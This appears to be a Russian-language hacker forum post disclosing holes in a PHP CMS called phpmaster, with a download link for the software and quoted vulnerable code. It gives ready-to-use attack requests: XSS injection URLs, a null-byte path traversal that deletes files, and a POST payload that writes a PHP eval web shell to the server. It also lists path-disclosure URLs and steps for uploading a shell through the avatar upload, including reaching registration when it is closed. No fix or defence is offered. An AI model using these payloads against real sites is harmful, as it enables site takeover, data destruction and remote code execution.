http://i057.radikal.ru/0904/bf/61d9e33305f1.png
скачать: http://www.phpedited.com/pages/dwld_file_op.php?kat=php-master&file=1224065184

xss
register_globals = On
/wwphpmaster/wap/tmpl/dw.php?url='>{xss}<!--
/wwphpmaster/wap/tmpl/hd.php?title=</title>{xss}&description=">{xss}&keywords=">{xss}&url='>{xss}
/wwphpmaster/wap/tmpl/err.php?action=badpass&error_color=>{xss}

удаление файлов
/wwphpmaster/wap/pages/kommf_del.php?kat=../../{filename}%00&file=b&entry=c
уязвимый код:$kat=$_GET['kat'];
$file = $_GET['file'];
$entry = $_GET['entry'];

unlink ("../file/$kat/$file/komm/rec.$entry");

заливка шелла
нужны прив. админа
/wwphpmaster/wap/pages/kommf_edited.php?file=.&kat=.&entry=.
post: name=.&msg=.&kat=../../500.php%00&gb_e_mail=<?=isset($_GET['a'])?eval($_GET['a']):'';?>&gb_site.
уязвимый код:
if (($_SESSION['dostup']==101) || ($_SESSION['dostup']==102) || ($_SESSION['dostup']==103))
...
$name=$_POST['name'];
$msg=$_POST['msg'];
$file_get=$_GET['file'];
$name = trim($name);
$kat = $_GET['kat'];
$entry_get = $_GET['entry'];
$em = $_POST['gb_e_mail'];
$si = $_POST['gb_site'];
...
$file = fopen("../file/$kat/$file_get/komm/rec.$entry_get","w+");
fputs($file,$name."\n");
fputs($file,$msg."\n");
fputs($file,$pz_z."\n");
fputs($file,$ses_z."\n");
fputs($file,$em."\n");
fputs($file,$si."\n");
fclose($file);
шелл:
/wwphpmaster/500.php?a=phpinfo();

раскрытие пути
бесполезное)
/wwphpmaster/wap/tmpl/func.php
/wwphpmaster/wap/tmpl/conf.php
/wwphpmaster/wap/tmpl/rega.php
/wwphpmaster/wap/pages/dwld_file.php?kat=../../&start=9

Заливка шелла через аватары,всё очень просто :) :
Регистрируемя,проходим авторизацию
Заходим в usr/anketa.php
Льём любой фаил через заливку аватаров :)
Забирает из wap\lcl\vtr\[nick].php
upd:
Если рега закрыта ничего не мешает нам обратиться напрямую к срипту регистрации pages/rgstr.php

слив РОА